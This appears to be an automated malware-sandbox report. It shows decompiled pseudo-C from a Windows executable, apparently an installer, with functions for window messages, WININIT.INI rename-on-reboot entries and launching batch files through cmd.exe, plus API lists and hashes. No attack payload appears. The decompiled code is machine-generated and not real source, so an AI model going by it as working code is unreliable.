							_t163 =  *0x6d62f8; // 0x0
							_t77 =  *0x6d62f4; // 0x0
							E005D6064(_t77, _t122, _t163, _t178, _t179, _v12);
							_pop(_t164);
							 *[fs:eax] = _t164;
						} else {
							_t169 = _t157 - 1;
							__eflags = _t169;
							if(_t169 == 0) {
								_push(_t181);
								_push(0x615bb7);
								_push( *[fs:edx]);
								 *[fs:edx] = _t183;
								E0040A1EC(0x6d62e8);
								E0040A3A4(0x6d62e8,  *(_v16[2] + 4) >> 0,  *((intOrPtr*)(_v16[2] + 8)), __eflags, 0);
								_v16[3] = 1;
								_pop(_t172);
								 *[fs:eax] = _t172;
							} else {
								__eflags = _t169 == 1;
								if(_t169 == 1) {
									_push(_t181);
									_push(0x615c0a);
									_push( *[fs:edx]);
									 *[fs:edx] = _t183;
									E0040A1EC(0x6d62ec);
									E0040A3A4(0x6d62ec,  *(_v16[2] + 4) >> 0,  *((intOrPtr*)(_v16[2] + 8)), __eflags, 0);
									_v16[3] = 1;
									_pop(_t176);
									 *[fs:eax] = _t176;
								}
							}
						}
						goto L21;
					}
				} else {
					_t104 = _t51 - 0xbb6;
					if(_t104 == 0) {
						 *0x6d62e4 = 0;
						 *0x6d62f4 = 0;
						 *0x6d62fc = 1;
						 *0x6d62fd = 0;
						PostMessageW(0, 0, 0, 0);
					} else {
						_t107 = _t104 - 1;
						if(_t107 == 0) {
							 *0x6d62fc = 1;
							_t108 = _v16;
							__eflags =  *((intOrPtr*)(_t108 + 4)) - 1;
							 *0x6d62fd =  *((intOrPtr*)(_t108 + 4)) == 1;
							PostMessageW(0, 0, 0, 0);
						} else {
							if(_t107 == 2) {
								SetForegroundWindow(_v16[1]);
							} else {
								_t118 =  *0x6d62f8; // 0x0
								_v16[3] = DefWindowProcW(_t118, _t122, _v16[1], _v16[2]);
							}
						}
					}
					L21:
					_pop(_t165);
					 *[fs:eax] = _t165;
					_pop(_t166);
					 *[fs:eax] = _t166;
					_push(E00615C85);
					E0040A1EC( &_v172);
					return E0040A228( &_v12, 2);
				}
			}






































                                                            0x006158c4
                                                            0x006158c4
                                                            0x006158c4
                                                            0x006158c5
                                                            0x006158c7
                                                            0x006158ce
                                                            0x006158cf
                                                            0x006158d2
                                                            0x006158d8
                                                            0x006158db
                                                            0x006158de
                                                            0x006158e3
                                                            0x006158e4
                                                            0x006158e9
                                                            0x006158ec
                                                            0x006158f1
                                                            0x006158f2
                                                            0x006158f7
                                                            0x006158fa
                                                            0x00615900
                                                            0x00615904
                                                            0x00615907
                                                            0x00615986
                                                            0x0061598b
                                                            0x0061598b
                                                            0x00615991
                                                            0x006159af
                                                            0x006159b0
                                                            0x006159b5
                                                            0x006159b8
                                                            0x006159c6
                                                            0x006159cd
                                                            0x006159ce
                                                            0x006159d3
                                                            0x006159d6
                                                            0x006159d9
                                                            0x006159de
                                                            0x006159e2
                                                            0x006159e3
                                                            0x006159e8
                                                            0x006159eb
                                                            0x006159f4
                                                            0x006159fb
                                                            0x006159fe
                                                            0x00615a01
                                                            0x00615a06
                                                            0x00615a0b
                                                            0x00615a0b
                                                            0x00615a0d
                                                            0x00615993
                                                            0x00615993
                                                            0x00615993
                                                            0x00615994
                                                            0x00615a7c
                                                            0x00615a7d
                                                            0x00615a82
                                                            0x00615a85
                                                            0x00615a96
                                                            0x00615a9d
                                                            0x00615a9e
                                                            0x00615aa3
                                                            0x00615aa6
                                                            0x00615aa9
                                                            0x00615aae
                                                            0x00615ab1
                                                            0x00615abf
                                                            0x00615ac4
                                                            0x00615ac4
                                                            0x00615ae3
                                                            0x00615af3
                                                            0x00615b06
                                                            0x00615b0e
                                                            0x00615b17
                                                            0x00615b1a
                                                            0x00615b44
                                                            0x00615b4a
                                                            0x00615b4f
                                                            0x00615b56
                                                            0x00615b59
                                                            0x0061599a
                                                            0x0061599a
                                                            0x0061599a
                                                            0x0061599b
                                                            0x00615b72
                                                            0x00615b73
                                                            0x00615b78
                                                            0x00615b7b
                                                            0x00615b83
                                                            0x00615b9e
                                                            0x00615ba6
                                                            0x00615baf
                                                            0x00615bb2
                                                            0x006159a1
                                                            0x006159a1
                                                            0x006159a2
                                                            0x00615bc5
                                                            0x00615bc6
                                                            0x00615bcb
                                                            0x00615bce
                                                            0x00615bd6
                                                            0x00615bf1
                                                            0x00615bf9
                                                            0x00615c02
                                                            0x00615c05
                                                            0x00615c05
                                                            0x006159a2
                                                            0x0061599b
                                                            0x00000000
                                                            0x00615994
                                                            0x00615909
                                                            0x00615909
                                                            0x0061590e
                                                            0x0061591d
                                                            0x00615926
                                                            0x0061592b
                                                            0x00615932
                                                            0x00615941
                                                            0x00615910
                                                            0x00615910
                                                            0x00615911
                                                            0x0061594b
                                                            0x00615952
                                                            0x00615955
                                                            0x00615959
                                                            0x00615968
                                                            0x00615913
                                                            0x00615916
                                                            0x00615979
                                                            0x00615918
                                                            0x00615c25
                                                            0x00615c33
                                                            0x00615c33
                                                            0x00615916
                                                            0x00615911
                                                            0x00615c36
                                                            0x00615c38
                                                            0x00615c3b
                                                            0x00615c5a
                                                            0x00615c5d
                                                            0x00615c60
                                                            0x00615c6b
                                                            0x00615c7d
                                                            0x00615c7d

                                                            APIs
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615941
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615968
                                                            • SetForegroundWindow.USER32(?,00000000,00615C40,?,00000000,00615C7E), ref: 00615979
                                                            • DefWindowProcW.USER32(00000000,?,?,?,00000000,00615C40,?,00000000,00615C7E), ref: 00615C2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MessagePostWindow$ForegroundProc
                                                            • String ID: ,hm$Cannot evaluate variable because [Code] isn't running yet
                                                            • API String ID: 602442252-4088602279
                                                            • Opcode ID: 035c484aa870e85df39017a6846f67cb24ba4c1d627fefdd11be8a5083181655
                                                            • Instruction ID: a4d9e41ba68ff62660f6698438dd6fdd69331843db6522f8d42236939986de27
                                                            • Opcode Fuzzy Hash: 035c484aa870e85df39017a6846f67cb24ba4c1d627fefdd11be8a5083181655
                                                            • Instruction Fuzzy Hash: F691BC34A04704EFD711DF69D8A1F99FBB6EB89700F19C4AAF8059B7A1C634AD80CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060D8B0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E0060D8B0(char __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v41;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				void* __ecx;
				char _t90;
				char _t167;
				char _t168;
				intOrPtr _t171;
				intOrPtr _t179;
				intOrPtr _t186;
				intOrPtr _t207;
				intOrPtr _t217;
				intOrPtr _t218;

				_t215 = __esi;
				_t214 = __edi;
				_t217 = _t218;
				_t171 = 8;
				goto L1;
				L4:
				if(E005C77E8() != 0) {
					__eflags = _t167;
					if(__eflags == 0) {
						E0060D650(_v8, _t167,  &_v68, _t214, _t215, __eflags);
						E0040A5F0( &_v8, _v68);
						__eflags = _v12;
						if(__eflags != 0) {
							E0060D650(_v12, _t167,  &_v72, _t214, _t215, __eflags);
							E0040A5F0( &_v12, _v72);
						}
					}
					_t90 = E0060C558(_t167, _v12, _v8, 5);
					__eflags = _t90;
					if(_t90 == 0) {
						E0060CE84(L"MoveFileEx");
					}
					__eflags = 0;
					_pop(_t186);
					 *[fs:eax] = _t186;
					_push(E0060DBD9);
					E0040A228( &_v72, 7);
					return E0040A228( &_v32, 7);
				} else {
					E005C7430( &_v16);
					E005C4EA4(_v16,  &_v56);
					E0040B4C8( &_v20, L"WININIT.INI", _v56);
					E0060D294(0, _t167, L".tmp", _v16, _t214, _t215,  &_v24);
					_push(_t217);
					_push(0x60db3e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t218;
					_v36 = 0;
					_v40 = 0;
					_push(_t217);
					_push(0x60dae2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t218;
					WritePrivateProfileStringW(0, 0, 0, E0040B278(_v20));
					_v36 = E005CBFB8(1, 1, 0, 3);
					_t179 = _v24;
					_v40 = E005CBFB8(1, 0, 1, 0);
					_v41 = 0;
					_t168 = 0;
					while(E005CC258(_v36) == 0) {
						E005CC268(_v36, _t168,  &_v28, _t214, _t215, __eflags);
						E004225EC(_v28, 1,  &_v32, _t215);
						__eflags = _v32;
						if(__eflags == 0) {
							L11:
							E005CC5A0(_v40, 1, _v28, _t215, __eflags);
							_t168 = 0;
							__eflags = 0;
							continue;
						} else {
							__eflags =  *_v32 - 0x5b;
							if(__eflags != 0) {
								goto L11;
							} else {
								__eflags = E00422368(_v32, _t179, L"[rename]");
								if(__eflags != 0) {
									__eflags = _v41;
									if(__eflags == 0) {
										goto L11;
									}
								} else {
									_v41 = 1;
									goto L11;
								}
							}
						}
						break;
					}
					_t223 = _v41;
					if(_v41 == 0) {
						E005CC5A0(_v40, _t168, L"[rename]", _t215, _t223);
					}
					_t224 = _v12;
					if(_v12 == 0) {
						E0040A5F0( &_v32, 0x60dc48);
					} else {
						E005C73D8(_v12, _t179,  &_v32, _t224);
					}
					_push(_v32);
					_push(0x60dc5c);
					E005C73D8(_v8, _t179,  &_v64, _t224);
					_push(_v64);
					E0040B550( &_v60, _t168, 3, _t214, _t215);
					E005CC5A0(_v40, _t168, _v60, _t215, _t224);
					_t225 = _t168;
					if(_t168 != 0) {
						E005CC5A0(_v40, _t168, _v28, _t215, _t225);
					}
					while(E005CC258(_v36) == 0) {
						E005CC268(_v36, _t168,  &_v28, _t214, _t215, __eflags);
						E005CC5A0(_v40, _t168, _v28, _t215, __eflags);
					}
					_pop(_t207);
					 *[fs:eax] = _t207;
					_push(E0060DAE9);
					E00408444(_v40);
					return E00408444(_v36);
				}
				L1:
				_push(0);
				_push(0);
				_t171 = _t171 - 1;
				if(_t171 != 0) {
					goto L1;
				} else {
					_t1 =  &_v8;
					 *_t1 = _t171;
					_push(__esi);
					_push(__edi);
					_v12 =  *_t1;
					_v8 = __edx;
					_t167 = __eax;
					E0040A2AC(_v8);
					E0040A2AC(_v12);
					_push(_t217);
					_push(0x60dbd2);
					 *[fs:eax] = _t218;
					E005C52C8(_v8,  &_v48, _t217,  *[fs:eax]);
					E0040A5F0( &_v8, _v48);
					if(_v12 != 0) {
						E005C52C8(_v12,  &_v52, _t217);
						E0040A5F0( &_v12, _v52);
					}
				}
				goto L4;
			}






























                                                            0x0060d8b0
                                                            0x0060d8b0
                                                            0x0060d8b1
                                                            0x0060d8b4
                                                            0x0060d8b4
                                                            0x0060d91e
                                                            0x0060d925
                                                            0x0060db57
                                                            0x0060db59
                                                            0x0060db61
                                                            0x0060db6c
                                                            0x0060db71
                                                            0x0060db75
                                                            0x0060db7d
                                                            0x0060db88
                                                            0x0060db88
                                                            0x0060db75
                                                            0x0060db97
                                                            0x0060db9c
                                                            0x0060db9e
                                                            0x0060dba5
                                                            0x0060dba5
                                                            0x0060dbaa
                                                            0x0060dbac
                                                            0x0060dbaf
                                                            0x0060dbb2
                                                            0x0060dbbf
                                                            0x0060dbd1
                                                            0x0060d92b
                                                            0x0060d92e
                                                            0x0060d939
                                                            0x0060d949
                                                            0x0060d95c
                                                            0x0060d963
                                                            0x0060d964
                                                            0x0060d969
                                                            0x0060d96c
                                                            0x0060d971
                                                            0x0060d976
                                                            0x0060d97b
                                                            0x0060d97c
                                                            0x0060d981
                                                            0x0060d984
                                                            0x0060d996
                                                            0x0060d9b0
                                                            0x0060d9b9
                                                            0x0060d9c8
                                                            0x0060d9cb
                                                            0x0060d9cf
                                                            0x0060da24
                                                            0x0060d9d9
                                                            0x0060d9e6
                                                            0x0060d9eb
                                                            0x0060d9ef
                                                            0x0060da17
                                                            0x0060da1d
                                                            0x0060da22
                                                            0x0060da22
                                                            0x00000000
                                                            0x0060d9f1
                                                            0x0060d9f4
                                                            0x0060d9f8
                                                            0x00000000
                                                            0x0060d9fa
                                                            0x0060da07
                                                            0x0060da09
                                                            0x0060da11
                                                            0x0060da15
                                                            0x00000000
                                                            0x00000000
                                                            0x0060da0b
                                                            0x0060da0b
                                                            0x00000000
                                                            0x0060da0b
                                                            0x0060da09
                                                            0x0060d9f8
                                                            0x00000000
                                                            0x0060d9ef
                                                            0x0060da30
                                                            0x0060da34
                                                            0x0060da3e
                                                            0x0060da3e
                                                            0x0060da43
                                                            0x0060da47
                                                            0x0060da5e
                                                            0x0060da49
                                                            0x0060da4f
                                                            0x0060da4f
                                                            0x0060da63
                                                            0x0060da66
                                                            0x0060da71
                                                            0x0060da76
                                                            0x0060da81
                                                            0x0060da8c
                                                            0x0060da91
                                                            0x0060da93
                                                            0x0060da9b
                                                            0x0060da9b
                                                            0x0060dab8
                                                            0x0060daa8
                                                            0x0060dab3
                                                            0x0060dab3
                                                            0x0060dac6
                                                            0x0060dac9
                                                            0x0060dacc
                                                            0x0060dad4
                                                            0x0060dae1
                                                            0x0060dae1
                                                            0x0060d8b9
                                                            0x0060d8b9
                                                            0x0060d8bb
                                                            0x0060d8bd
                                                            0x0060d8be
                                                            0x00000000
                                                            0x0060d8c0
                                                            0x0060d8c0
                                                            0x0060d8c0
                                                            0x0060d8c4
                                                            0x0060d8c5
                                                            0x0060d8c6
                                                            0x0060d8c9
                                                            0x0060d8cc
                                                            0x0060d8d1
                                                            0x0060d8d9
                                                            0x0060d8e0
                                                            0x0060d8e1
                                                            0x0060d8e9
                                                            0x0060d8f2
                                                            0x0060d8fd
                                                            0x0060d906
                                                            0x0060d90e
                                                            0x0060d919
                                                            0x0060d919
                                                            0x0060d906
                                                            0x00000000

                                                            APIs
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                            • API String ID: 390214022-3304407042
                                                            • Opcode ID: 1516e58ba1303ba12e62d3941270339ebbfe120b0d1e0e5f83981064806d38df
                                                            • Instruction ID: 9ccae61fee5444c96898e798bd08ad00ad1f0a42c005b5ee0ec7678d9f590d11
                                                            • Opcode Fuzzy Hash: 1516e58ba1303ba12e62d3941270339ebbfe120b0d1e0e5f83981064806d38df
                                                            • Instruction Fuzzy Hash: 3E810974A44209AFDB04EBE5C882BDEBBB6EF88304F504669E400B73D1E775AE45CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060F06C, Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 157COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E0060F06C(signed char __eax, void* __ebx, char __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, void* _a8, signed short _a12, signed char _a16, char _a20) {
				char _v8;
				signed char _v9;
				short _v32;
				intOrPtr _v36;
				char _v80;
				void* _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t75;
				intOrPtr _t107;
				char _t114;
				intOrPtr _t132;
				void* _t142;
				intOrPtr* _t144;
				void* _t147;

				_t116 = __ecx;
				_v116 = 0;
				_v120 = 0;
				_v108 = 0;
				_v112 = 0;
				_v104 = 0;
				_v100 = 0;
				_v8 = 0;
				_t114 = __ecx;
				_t142 = __edx;
				_v9 = __eax;
				_t144 = _a4;
				E0040A2AC(_a20);
				_push(_t147);
				_push(0x60f26e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147 + 0xffffff8c;
				E0040B660(_t142, 0x60f28c);
				if(0 != 0) {
					_push(0x60f29c);
					_push(_t142);
					_push(0x60f29c);
					E0040B550( &_v8, _t114, 3, _t142, _t144);
					__eflags = _t114;
					if(_t114 != 0) {
						_push(_v8);
						_push(0x60f2ac);
						_push(_t114);
						E0040B550( &_v8, _t114, 3, _t142, _t144);
					}
					E005C53D0(_t142,  &_v100);
					_t63 = E00422368(_v100, _t116, L".bat");
					__eflags = _t63;
					if(_t63 == 0) {
						L6:
						_t64 = E005C77E8();
						__eflags = _t64;
						if(_t64 == 0) {
							_push(0x60f29c);
							E005C7430( &_v120);
							E005C4EA4(_v120,  &_v116);
							_push(_v116);
							_push(L"COMMAND.COM\" /C ");
							_push(_v8);
							E0040B550( &_v8, _t114, 4, _t142, _t144);
						} else {
							_push(0x60f29c);
							E005C745C( &_v112);
							E005C4EA4(_v112,  &_v108);
							_push(_v108);
							_push(L"cmd.exe\" /C \"");
							_push(_v8);
							_push(0x60f29c);
							E0040B550( &_v8, _t114, 5, _t142, _t144);
						}
						goto L9;
					} else {
						E005C53D0(_t142,  &_v104);
						_t107 = E00422368(_v104, _t116, L".cmd");
						__eflags = _t107;
						if(_t107 != 0) {
							L9:
							__eflags = _a20;
							if(_a20 == 0) {
								E005C5378(_t142, _t116,  &_a20);
							}
							goto L11;
						}
						goto L6;
					}
				} else {
					E0040A5F0( &_v8, _t114);
					L11:
					E00407760( &_v80, 0x44);
					_v80 = 0x44;
					_v36 = 1;
					_v32 = _a12 & 0x0000ffff;
					_t150 = _a20;
					if(_a20 == 0) {
						E005C745C( &_a20);
					}
					_t75 = E0040B278(_a20);
					E0060C038(_v9 & 0x000000ff, E0040B278(_v8), 0, _t150,  &_v96,  &_v80, _t75, 0, 0x4000000, 0, 0, 0);
					asm("sbb ebx, ebx");
					_t115 = _t114 + 1;
					if(_t114 + 1 != 0) {
						CloseHandle(_v92);
						E0060EFD8(_v96, _t115, _a16 & 0x000000ff, _t142, _t144, _t144);
					} else {
						 *_t144 = GetLastError();
					}
					_pop(_t132);
					 *[fs:eax] = _t132;
					_push(E0060F275);
					E0040A228( &_v120, 6);
					E0040A1C8( &_v8);
					return E0040A1C8( &_a20);
				}
			}

























                                                            0x0060f06c
                                                            0x0060f077
                                                            0x0060f07a
                                                            0x0060f07d
                                                            0x0060f080
                                                            0x0060f083
                                                            0x0060f086
                                                            0x0060f089
                                                            0x0060f08c
                                                            0x0060f08e
                                                            0x0060f090
                                                            0x0060f093
                                                            0x0060f099
                                                            0x0060f0a0
                                                            0x0060f0a1
                                                            0x0060f0a6
                                                            0x0060f0a9
                                                            0x0060f0b3
                                                            0x0060f0b8
                                                            0x0060f0c9
                                                            0x0060f0ce
                                                            0x0060f0cf
                                                            0x0060f0dc
                                                            0x0060f0e1
                                                            0x0060f0e3
                                                            0x0060f0e5
                                                            0x0060f0e8
                                                            0x0060f0ed
                                                            0x0060f0f6
                                                            0x0060f0f6
                                                            0x0060f100
                                                            0x0060f10d
                                                            0x0060f112
                                                            0x0060f114
                                                            0x0060f131
                                                            0x0060f131
                                                            0x0060f136
                                                            0x0060f138
                                                            0x0060f171
                                                            0x0060f179
                                                            0x0060f184
                                                            0x0060f189
                                                            0x0060f18c
                                                            0x0060f191
                                                            0x0060f19c
                                                            0x0060f13a
                                                            0x0060f13a
                                                            0x0060f142
                                                            0x0060f14d
                                                            0x0060f152
                                                            0x0060f155
                                                            0x0060f15a
                                                            0x0060f15d
                                                            0x0060f16a
                                                            0x0060f16a
                                                            0x00000000
                                                            0x0060f116
                                                            0x0060f11b
                                                            0x0060f128
                                                            0x0060f12d
                                                            0x0060f12f
                                                            0x0060f1a1
                                                            0x0060f1a1
                                                            0x0060f1a5
                                                            0x0060f1ac
                                                            0x0060f1ac
                                                            0x00000000
                                                            0x0060f1a5
                                                            0x00000000
                                                            0x0060f12f
                                                            0x0060f0ba
                                                            0x0060f0bf
                                                            0x0060f1b1
                                                            0x0060f1bb
                                                            0x0060f1c0
                                                            0x0060f1c7
                                                            0x0060f1d2
                                                            0x0060f1d6
                                                            0x0060f1da
                                                            0x0060f1df
                                                            0x0060f1df
                                                            0x0060f1f4
                                                            0x0060f212
                                                            0x0060f21a
                                                            0x0060f21c
                                                            0x0060f21f
                                                            0x0060f22e
                                                            0x0060f23e
                                                            0x0060f221
                                                            0x0060f226
                                                            0x0060f226
                                                            0x0060f245
                                                            0x0060f248
                                                            0x0060f24b
                                                            0x0060f258
                                                            0x0060f260
                                                            0x0060f26d
                                                            0x0060f26d

                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060F29C,0060F29C,?,0060F29C,00000000), ref: 0060F221
                                                            • CloseHandle.KERNEL32(006B7E1B,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060F29C,0060F29C,?,0060F29C), ref: 0060F22E
                                                              • Part of subcall function 0060EFD8: WaitForInputIdle.USER32 ref: 0060F004
                                                              • Part of subcall function 0060EFD8: MsgWaitForMultipleObjects.USER32 ref: 0060F026
                                                              • Part of subcall function 0060EFD8: GetExitCodeProcess.KERNEL32 ref: 0060F037
                                                              • Part of subcall function 0060EFD8: CloseHandle.KERNEL32(00000001,0060F064,0060F05D,?,?,?,00000001,?,?,0060F406,?,00000000,0060F41C,?,?,?), ref: 0060F057
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                            • API String ID: 854858120-615399546
                                                            • Opcode ID: 302ca1a099cb30e81fc891af75844f8b62dda31169773e0edeec6a06f46f331e
                                                            • Instruction ID: 0730013a778409a59d543d7128fc9cae65caf948aa4e6a3f37707057903c9a02
                                                            • Opcode Fuzzy Hash: 302ca1a099cb30e81fc891af75844f8b62dda31169773e0edeec6a06f46f331e
                                                            • Instruction Fuzzy Hash: 69512134A8030DABDB14EFE5C892ADEBBBAFF44304F60447AB404A76C1D7749E059B95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408E18, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E00408E18(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E004092D8(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040901C(_t71);
								_t57 =  *0x6cf8fc; // 0x6c76d4
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00408AF8( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}











                                                            0x00408e1f
                                                            0x00408e21
                                                            0x00408e23
                                                            0x00408e26
                                                            0x00408e26
                                                            0x00408e2d
                                                            0x00408e34
                                                            0x00000000
                                                            0x00000000
                                                            0x00408e42
                                                            0x00408e49
                                                            0x00408ee1
                                                            0x00408ee1
                                                            0x00408ee1
                                                            0x00408ee5
                                                            0x00000000
                                                            0x00000000
                                                            0x00408ef0
                                                            0x00408ef6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00408ef8
                                                            0x00408ef8
                                                            0x00408efd
                                                            0x00408f03
                                                            0x00408f0a
                                                            0x00408f14
                                                            0x00408f19
                                                            0x00408f20
                                                            0x00408f27
                                                            0x00408f35
                                                            0x00408f43
                                                            0x00408f37
                                                            0x00408f3f
                                                            0x00408f3f
                                                            0x00408f35
                                                            0x00408f49
                                                            0x00408f6b
                                                            0x00408f74
                                                            0x00408f78
                                                            0x00408f7c
                                                            0x00000000
                                                            0x00408f4b
                                                            0x00408f4b
                                                            0x00408f50
                                                            0x00000000
                                                            0x00000000
                                                            0x00408f5c
                                                            0x00408f62
                                                            0x00000000
                                                            0x00000000
                                                            0x00408f64
                                                            0x00000000
                                                            0x00408f64
                                                            0x00408f4b
                                                            0x00408f81
                                                            0x00408f81
                                                            0x00408f90
                                                            0x00408f97
                                                            0x00408f9a
                                                            0x00408f9a
                                                            0x00000000
                                                            0x00408f90
                                                            0x00000000
                                                            0x00408ee1
                                                            0x00408e54
                                                            0x00408e5a
                                                            0x00408e60
